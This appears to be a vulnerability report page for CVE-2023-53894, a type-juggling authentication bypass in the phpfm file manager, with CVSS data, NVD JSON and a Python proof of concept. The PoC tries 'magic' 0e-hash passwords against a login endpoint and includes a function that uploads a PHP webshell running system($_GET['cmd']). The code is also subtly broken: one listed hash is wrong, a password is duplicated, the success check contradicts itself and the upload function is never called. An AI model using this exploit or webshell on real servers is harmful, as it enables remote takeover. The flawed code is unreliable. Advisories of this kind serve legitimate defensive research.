Security Vulnerability Report
CVE-2023-53894 CVSS 9.8 CRITICAL

CVE-2023-53894

Published: 2025-12-16 17:16:02
Last Modified: 2026-01-21 22:26:09

Description

phpfm 1.7.9 contains an authentication bypass vulnerability that allows attackers to log in by exploiting loose type comparison in password hash validation. Attackers can craft specific password hashes beginning with 0e or 00e to bypass authentication and upload malicious PHP files to the server.

CVSS Details

CVSS Score
9.8 (CVSS v3.1 base score; the raw JSON below also carries a CVSS v4.0 base score of 9.3, so the two ratings differ by version)
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dulldusk:phpfilemanager:1.7.9:*:*:*:*:*:*:* - VULNERABLE
phpfm < 1.7.9 (note: this range excludes 1.7.9 itself, but the CPE entry above and the description both list 1.7.9 as affected; treat 1.7.9 and earlier as in scope until the affected range is confirmed against the vendor)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2023-53894 Authentication Bypass PoC # Target: phpfm <= 1.7.9 # Attack: Type Juggling in password hash validation import requests import hashlib target_url = "http://target.com/phpfm" # Known passwords with MD5 hashes starting with 0e magic_passwords = [ "240610708", # MD5: 0e4340419627524296 "QNKCDZO", # MD5: 0e830400451993494058024219903391 "s878926199a", # MD5: 0e545993274517709034328855841020 "s155964671a", # MD5: 0e342768416822451524974117254469 "s214587387a", # MD5: 0e848240845830648910665489740247 "s214587387a" # MD5: 0e848240845830648910665489740247 ] def check_vulnerability(): """Check if target is vulnerable to CVE-2023-53894""" print(f"[*] Testing target: {target_url}") for password in magic_passwords: md5_hash = hashlib.md5(password.encode()).hexdigest() print(f"[*] Trying password: {password} (MD5: {md5_hash})") # Attempt login with magic password login_data = { "username": "admin", "password": password } try: response = requests.post(f"{target_url}/login.php", data=login_data, timeout=10) if response.status_code == 200: if "success" in response.text.lower() or response.status_code == 302: print(f"[!] VULNERABLE! 
Login successful with password: {password}") print(f"[+] MD5 hash: {md5_hash}") return True except Exception as e: print(f"[-] Error: {e}") print("[-] Target may not be vulnerable or already patched") return False def upload_shell(session_cookie): """Upload malicious PHP file after successful authentication""" print("[*] Uploading webshell...") webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" files = { 'file': ('shell.php', webshell, 'application/x-php') } cookies = {'PHPSESSID': session_cookie} try: response = requests.post(f"{target_url}/upload.php", files=files, cookies=cookies) if response.status_code == 200: print("[+] Webshell uploaded successfully!") print(f"[*] Access shell at: {target_url}/uploads/shell.php?cmd=whoami") except Exception as e: print(f"[-] Upload failed: {e}") if __name__ == "__main__": check_vulnerability()

References (listed in the "references" array of the raw JSON data below: the vendor product page, an Exploit-DB entry, and a VulnCheck advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53894", "sourceIdentifier": "[email protected]", "published": "2025-12-16T17:16:01.550", "lastModified": "2026-01-21T22:26:08.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpfm 1.7.9 contains an authentication bypass vulnerability that allows attackers to log in by exploiting loose type comparison in password hash validation. Attackers can craft specific password hashes beginning with 0e or 00e to bypass authentication and upload malicious PHP files to the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1390"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dulldusk:phpfilemanager:1.7.9:*:*:*:*:*:*:*", "matchCriteriaId": "39FEDC79-A728-437C-9C55-BF2FE3814283"}]}]}], "references": [{"url": "https://www.dulldusk.com/phpfm/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51594", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/phpfm-authentication-bypass-via-type-juggling-vulnerability", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}